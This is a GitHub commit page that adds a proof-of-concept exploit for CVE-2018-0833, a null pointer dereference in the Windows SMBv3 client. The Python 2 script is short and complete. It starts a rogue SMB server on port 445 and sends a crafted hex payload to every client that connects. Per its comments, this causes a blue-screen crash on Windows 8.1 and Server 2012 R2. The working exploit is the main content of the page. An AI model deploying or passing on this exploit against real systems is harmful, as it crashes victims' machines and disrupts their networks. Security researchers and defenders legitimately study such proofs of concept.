Skip to content

Commit

Permalink
SMBv3 Null Pointer Dereference Denial of Service
Browse files Browse the repository at this point in the history
  • Loading branch information
iBearcat authored Mar 21, 2018
1 parent 0e74344 commit 07d9ace
Show file tree
Hide file tree
Showing 2 changed files with 22 additions and 0 deletions.
Binary file added CVE-2018-0833/exploit.gif
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
22 changes: 22 additions & 0 deletions CVE-2018-0833/poc.py
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,22 @@
# Exploit Title: Microsoft Windows SMB Client Null Pointer Dereference Denial of Service
# Date: 26/02/2018
# Exploit Author: Nabeel Ahmed
# Version: SMBv3
# Tested on: Windows 8.1 (x86), Windows Server 2012 R2 (x64)
# CVE : CVE-2018-0833

import SocketServer
from binascii import unhexlify
payload = '000000ecfd534d4241414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141'
class byebye(SocketServer.BaseRequestHandler):
def handle(self):
try:
print "From:", self.client_address
print "[*]Sending Payload..."
self.request.send(unhexlify(payload))
except Exception:
print "BSoD Triggered on", self.client_address
pass
SocketServer.TCPServer.allow_reuse_address = 1
launch = SocketServer.TCPServer(('', 445),byebye)
launch.serve_forever()

0 comments on commit 07d9ace

Please sign in to comment.